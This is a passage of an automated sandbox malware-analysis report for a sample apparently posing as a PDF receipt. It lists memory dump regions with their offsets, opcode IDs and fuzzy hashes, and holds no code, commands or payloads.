                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fe12e146aab1a1fe6b4d2eced1050d69d3c509c7a3f325a2e4ed6686a46544c5
                                                                                                                                                          • Instruction ID: 8542d3e4b0a386820455d1614eb997055817764af1a38ce7a323784f27f64845
                                                                                                                                                          • Opcode Fuzzy Hash: fe12e146aab1a1fe6b4d2eced1050d69d3c509c7a3f325a2e4ed6686a46544c5
                                                                                                                                                          • Instruction Fuzzy Hash: 49717A70A002059FDB14DF69C484BAEBBF6FF89310F14846ED50AAB361DB74E841CB65
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6b2a799fa81f998b67b109b78525ea257188a335d1e2e782c27b2b5e441fb1b0
                                                                                                                                                          • Instruction ID: 322fc60b942620b648525b6a51e703ede221334167ecf0d696ddf1b0669d1450
                                                                                                                                                          • Opcode Fuzzy Hash: 6b2a799fa81f998b67b109b78525ea257188a335d1e2e782c27b2b5e441fb1b0
                                                                                                                                                          • Instruction Fuzzy Hash: 8A716C30E00609CFDB14DFB9D8586ADBBB2FF89310F149129E616A7361EF749945CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7b211bc223c79805c6feafb310b38febdc08317cff86bc07225f069b9eea2c82
                                                                                                                                                          • Instruction ID: 3601ef5d10f269908f1604f5d38a4873eaa7016f00977bdc60fcf9495672a95b
                                                                                                                                                          • Opcode Fuzzy Hash: 7b211bc223c79805c6feafb310b38febdc08317cff86bc07225f069b9eea2c82
                                                                                                                                                          • Instruction Fuzzy Hash: 46516830B002009FDB15EB69C488BAEB7FABF89214F14456DD60ADB7A1DB71EC81CB55
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 90d6e2e5919727ac3bb277d60031b043cefe95efa0775f9e3499812c1b66f749
                                                                                                                                                          • Instruction ID: 50fd7393220cc6dbc026b79c704285b5ea551b67f4451f131fb92c25e77e1c2a
                                                                                                                                                          • Opcode Fuzzy Hash: 90d6e2e5919727ac3bb277d60031b043cefe95efa0775f9e3499812c1b66f749
                                                                                                                                                          • Instruction Fuzzy Hash: 35319C30E12208DFCB14DFA4E5985ADFFB2FF85301F218569E152A72A5CB31A865CB44
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1d64a830fdf9ef95b1604f5153affcb24103f8a62f1c67f4a4cc095dd98c7aa8
                                                                                                                                                          • Instruction ID: 917032705b67477c2404a9a1b32017ce9a7fc924330d981b83910cc01cb033b2
                                                                                                                                                          • Opcode Fuzzy Hash: 1d64a830fdf9ef95b1604f5153affcb24103f8a62f1c67f4a4cc095dd98c7aa8
                                                                                                                                                          • Instruction Fuzzy Hash: 07418070A04209DFCB48EBB9C554A6EBBF6FF84300F648469D509E73A9CE349D42CB51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 635b68c3386244d94e326a79a5f0971d70bbce50629154e0000ed087a3671dca
                                                                                                                                                          • Instruction ID: 7bfb6d401fa45b0192d0306ac905c074f561118c4bacd32c37e79de1d442f332
                                                                                                                                                          • Opcode Fuzzy Hash: 635b68c3386244d94e326a79a5f0971d70bbce50629154e0000ed087a3671dca
                                                                                                                                                          • Instruction Fuzzy Hash: AD419270E00205CFDB24EF78C0986ADBBB6EF88214F14492DD601BB354DB756D81CBA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8776fdcc62c215b9f54b96626b126df9cfa5c96b77859daa9336c6efc31bb962
                                                                                                                                                          • Instruction ID: 61385a89449887421bee1f8af0523bd6039656514b0807b6bfd787409bc85802
                                                                                                                                                          • Opcode Fuzzy Hash: 8776fdcc62c215b9f54b96626b126df9cfa5c96b77859daa9336c6efc31bb962
                                                                                                                                                          • Instruction Fuzzy Hash: 37410735B042288FDB44EFA8C894BDDB7B2FF48314F100069EA05AB3B1DB749841CBA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          • Opcode Fuzzy Hash: dca634253311a551f72da5f11b4c47ab988220de5f18bf7ea7d4f93dfd127b9a
                                                                                                                                                          • Instruction Fuzzy Hash: 6B212C307106118FCB18EB29C864E2A77EABF85615B14846DE64ACB774DB72DC86CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a5980c012c8c2534ff87721d4120028b290816273551a8fa24193a59c7a94c2c
                                                                                                                                                          • Instruction ID: 65f49186137c86695fde715f9d0f642bd9c978dd5eff861aa334de51941f7240
                                                                                                                                                          • Opcode Fuzzy Hash: a5980c012c8c2534ff87721d4120028b290816273551a8fa24193a59c7a94c2c
                                                                                                                                                          • Instruction Fuzzy Hash: 3931A3B4E1420ADFCB48DFA9C58599EBBF2BF89310F14C5AAD415E7224E730DA418F51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fc5a56ec8d2c3e80ac22c5a0e41f77c37171956557280bb09c055bf0371aff1f
                                                                                                                                                          • Instruction ID: 8ce7c6601eaa9dc5ab568b7533be5b0905d353560d34ac3922de39b7e9f0b972
                                                                                                                                                          • Opcode Fuzzy Hash: fc5a56ec8d2c3e80ac22c5a0e41f77c37171956557280bb09c055bf0371aff1f
                                                                                                                                                          • Instruction Fuzzy Hash: 0C21D6B4E0420EDFCB44DFA9C5859AEBBF2BB89300F15C5AA9419E7324E730DA418F51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a43464ddf597c5b0a2749e9c89cc59dc7d6208bb82e5bfd8a8ca0dde37f173eb
                                                                                                                                                          • Instruction ID: 488b4083d97c41488a53148564304f791eca8ee259db77140c285a7e413153e5
                                                                                                                                                          • Opcode Fuzzy Hash: a43464ddf597c5b0a2749e9c89cc59dc7d6208bb82e5bfd8a8ca0dde37f173eb
                                                                                                                                                          • Instruction Fuzzy Hash: BF21C635F402068FDF05DFA8C9805FEBBB7BF89210B18452AD505A72A4EB359E41CBA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0a3abd37430126ec80f92debbed74e4a691820e0aa457dfe126df2e77cbb36f4
                                                                                                                                                          • Instruction ID: bf729eb59e914fe3cc595d1a0a726c9b1bf8a1ab7b62866117d1e6991cd08202
                                                                                                                                                          • Opcode Fuzzy Hash: 0a3abd37430126ec80f92debbed74e4a691820e0aa457dfe126df2e77cbb36f4
                                                                                                                                                          • Instruction Fuzzy Hash: 3B212670E0420ADFDB04CFA9C5416AEFBF1BF8A200F1481AA9415E7264E7709A418B55
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b4a870922b8d45cf44d7a8567373a31c75565f4b89b46b753556b088d2d621f5
                                                                                                                                                          • Instruction ID: 704a6a79b32a229586686220913e68fbc12606730ecab53917171efc503e52d9
                                                                                                                                                          • Opcode Fuzzy Hash: b4a870922b8d45cf44d7a8567373a31c75565f4b89b46b753556b088d2d621f5
                                                                                                                                                          • Instruction Fuzzy Hash: F021E7B8D0820DDFCB44CFA9C1809AEBBF5EB49314F2090A5D919E7721D3709A41DF61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8f7cada0de77df604b49bf53727caadf0b9af747491d3cfe088e2b2d38fa243
                                                                                                                                                          • Instruction ID: b5ff351a261983bd64b4b9320b2f6494b49bd49e9a006426f301740bff644622
                                                                                                                                                          • Opcode Fuzzy Hash: f8f7cada0de77df604b49bf53727caadf0b9af747491d3cfe088e2b2d38fa243
                                                                                                                                                          • Instruction Fuzzy Hash: C52137B6C043499FCB20CF99D944ADEBFF4EB49320F00805AE954A7211C379A945CFA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d377590b3c7813d5f1df9ea784ba80921e592c742c8f0f5e1ad7abc141d9b6c
                                                                                                                                                          • Instruction ID: aa32ed716c05841ae8eab337dbf5966441e55bb378af5bfd87102b14532685ce
                                                                                                                                                          • Opcode Fuzzy Hash: 5d377590b3c7813d5f1df9ea784ba80921e592c742c8f0f5e1ad7abc141d9b6c
                                                                                                                                                          • Instruction Fuzzy Hash: 54213C70E01348CFC708DFA4D5586ADBBBAFB99705B109128D82AEB369DB309C42CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f2d1eb286488cc92101334acca502004e0668b3a1bc24dc68d1cecc639f7c258
                                                                                                                                                          • Instruction ID: c66d346c054574e536e9e8f78e0c9c3b8321a2578912605c64aef7ce146e8e6e
                                                                                                                                                          • Opcode Fuzzy Hash: f2d1eb286488cc92101334acca502004e0668b3a1bc24dc68d1cecc639f7c258
                                                                                                                                                          • Instruction Fuzzy Hash: F82107B0E0420EDFDB44CFA9C5415AEFBF1BF89200F10D5AA9414A7264E7709B008F95
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a61856c5d29624c83c80407639e4b8ad3f35545b9f7d28679fc7724165ecbed8
                                                                                                                                                          • Instruction ID: 40eeef87770defc58977949913457d7369b306b571fe9f8260bd607ed832fb50
                                                                                                                                                          • Opcode Fuzzy Hash: a61856c5d29624c83c80407639e4b8ad3f35545b9f7d28679fc7724165ecbed8
                                                                                                                                                          • Instruction Fuzzy Hash: 90214774E0520EEFCB44CFA8E4951ADBFF1AB89310F2085AAD809E7354E7349A41DB52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8d49a4856d2d573173ac5f3dd32ad487d6758f2b048e59f4422fc9a90636adfe
                                                                                                                                                          • Instruction ID: a9f6c437c722ffcac03b45b04139bf32ab42d0f3cd4cab3ad0f72aa921335cde
                                                                                                                                                          • Opcode Fuzzy Hash: 8d49a4856d2d573173ac5f3dd32ad487d6758f2b048e59f4422fc9a90636adfe
                                                                                                                                                          • Instruction Fuzzy Hash: FF2129B4E0521ADFCB44DFA9D9415AEBBF2FF89210F1484AAC419E7364E7309A00CB61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1723254561.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_160d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e1e8ea0ca924883b624ebab9c525c01c7332a6e753d551a4894887f87d90962c
                                                                                                                                                          • Instruction ID: 71753c6a7fa1eb688280027d5117c41792202db6d0de4875dff435ecc23bf5ce
                                                                                                                                                          • Opcode Fuzzy Hash: e1e8ea0ca924883b624ebab9c525c01c7332a6e753d551a4894887f87d90962c
                                                                                                                                                          • Instruction Fuzzy Hash: 7421A4755093808FDB07CF64D994716BF71EB46214F28C6DAD8498F6A7C33A980ACB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                          • Instruction ID: f9526910ccae3cf0a086f796e517bfd8bff411fa78db618b500c1d5b283b3be7
                                                                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                          • Instruction Fuzzy Hash: EA11BB75504280DFDB06CF98C9C4B16BFA1FB84224F24C6AAD9494B796C33AD40ACB61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6a7730421f983c0003deb35914c86635a8a9a2ebdaf1ae0eec986bfa2b619bf8
                                                                                                                                                          • Instruction ID: b2fb37a611cf29b0cced5c1a346472a97af084af31566933b24f6e065f8c37c9
                                                                                                                                                          • Opcode Fuzzy Hash: 6a7730421f983c0003deb35914c86635a8a9a2ebdaf1ae0eec986bfa2b619bf8
                                                                                                                                                          • Instruction Fuzzy Hash: 35112BB4E0520ADFCB48CFA9D6411AEBFF1EB8A310F2481AAD405E3314E7345A409B51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7778cef593cc42576b05d7b849b7b8f6d0a588ef762260f96b0fc5869312ed2d
                                                                                                                                                          • Instruction ID: f64c6c2f41bda73813fcc14ac56c0fa63ccf043c20e3de693f9bd6e546c6acec
                                                                                                                                                          • Opcode Fuzzy Hash: 7778cef593cc42576b05d7b849b7b8f6d0a588ef762260f96b0fc5869312ed2d
                                                                                                                                                          • Instruction Fuzzy Hash: 981100B1C006098FCB10DF9AD448A8EFBF8EB48320F20801AE858A3214D779A545CFA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 32cfe7e5000b0fc73aa6b350dac3ee920802f4ab1d525783dde1ebd4837d7b07
                                                                                                                                                          • Instruction ID: fd4afa38dcbb51cd47f086f6d492705042781585a73246359ce1c3aba799753e
                                                                                                                                                          • Opcode Fuzzy Hash: 32cfe7e5000b0fc73aa6b350dac3ee920802f4ab1d525783dde1ebd4837d7b07
                                                                                                                                                          • Instruction Fuzzy Hash: 271134B1C006488FCB20DF9AD444ADEFBF8EB48320F10C02AE859A7310D379A944CFA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 034e7e27f8a72217f7267168a5c1f9a4bbdbd7b3542f4f2927160865daf28b85
                                                                                                                                                          • Instruction ID: ed6f5a1a874aca1ac7993b81384ffaf3f5bb161140aee764be7486b34650d17d
                                                                                                                                                          • Opcode Fuzzy Hash: 034e7e27f8a72217f7267168a5c1f9a4bbdbd7b3542f4f2927160865daf28b85
                                                                                                                                                          • Instruction Fuzzy Hash: 691104B1D046499FCB20DF9AD444ADEFBF8EB48320F10C42AE859A7710D379A945CFA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0a68d3d13d5b9238d617629df0d00cde4610eb6f9852f2d24a390a628a4fd308
                                                                                                                                                          • Instruction ID: f788756c01e2d9ef7df9be26da1e42636a1b3d59ff04dadab225c2e8d2c3a939
                                                                                                                                                          • Opcode Fuzzy Hash: 0a68d3d13d5b9238d617629df0d00cde4610eb6f9852f2d24a390a628a4fd308
                                                                                                                                                          • Instruction Fuzzy Hash: 1D111C74D05218DFDB08CFAAD4449AEBBFAEF89300F00D02AE815A7360DB309541CF51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2fb9762fd452ecce5eaced9b6164aca281e0fc3f9f4d6b027d4989f662c0d93b
                                                                                                                                                          • Instruction ID: 03b1531d1ceec3d34b31640495c0b7648452dff82a3d85fd2e9890beab154ebf
                                                                                                                                                          • Opcode Fuzzy Hash: 2fb9762fd452ecce5eaced9b6164aca281e0fc3f9f4d6b027d4989f662c0d93b
                                                                                                                                                          • Instruction Fuzzy Hash: 051148B4E0120ADFCB48DFA9D54419EBBF2AB88300F20C5AAD405E3354E7309B40CB51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7c229399ca8db9fa843918578ed55999e6035d7a3d2af5271de4c8517f57b80d
                                                                                                                                                          • Instruction ID: a10056b49ba48e67248a3bed55fe75a19809d92e56c183ac4e650c64de570f3c
                                                                                                                                                          • Opcode Fuzzy Hash: 7c229399ca8db9fa843918578ed55999e6035d7a3d2af5271de4c8517f57b80d
                                                                                                                                                          • Instruction Fuzzy Hash: 3C1115B4E0520EDFDB48DFA9D54469EBBF2AB88304F20C5AA9815E3364E774DA01CB51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1f6c0010a7e93fcdbb855e367ee3c0d7ec999016a85caf8847abb972ce33b666
                                                                                                                                                          • Instruction ID: 00296ad88d7748bb534a7fcf6e38bac7678a34e689a898a616decb27fbe18289
                                                                                                                                                          • Opcode Fuzzy Hash: 1f6c0010a7e93fcdbb855e367ee3c0d7ec999016a85caf8847abb972ce33b666
                                                                                                                                                          • Instruction Fuzzy Hash: B51103B4E0521EDBCB44DFA9D5416AEBBF6EF88200F20D4AA8419E7224E7309A00CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ec7be10761069ea413b9ffd303394af55c5cd62e174892bae6299d128698a826
                                                                                                                                                          • Instruction ID: 4bcefb4949295ccd6e47de6f08aa1f803d540401f4c1344a7948be2b2bd03e3c
                                                                                                                                                          • Opcode Fuzzy Hash: ec7be10761069ea413b9ffd303394af55c5cd62e174892bae6299d128698a826
                                                                                                                                                          • Instruction Fuzzy Hash: 57112AB4E0520E9FCB45CFA9D54159EBBB6BB99300F14C0AAD818E7354EB309B01CB51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f0e60d0564df5f8d29e752e4ba416778e9810e9188ad7bc8b29eed2f7c5ab99
                                                                                                                                                          • Instruction ID: 112284b34d7bdfec44e2fa28c0352eaa66ffe695b1306414239793246636d582
                                                                                                                                                          • Opcode Fuzzy Hash: 7f0e60d0564df5f8d29e752e4ba416778e9810e9188ad7bc8b29eed2f7c5ab99
                                                                                                                                                          • Instruction Fuzzy Hash: B4118270E00609CFEB14EF64C1587BD7AB6EF84314F14042DD201AB280CFB85D81CBA5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
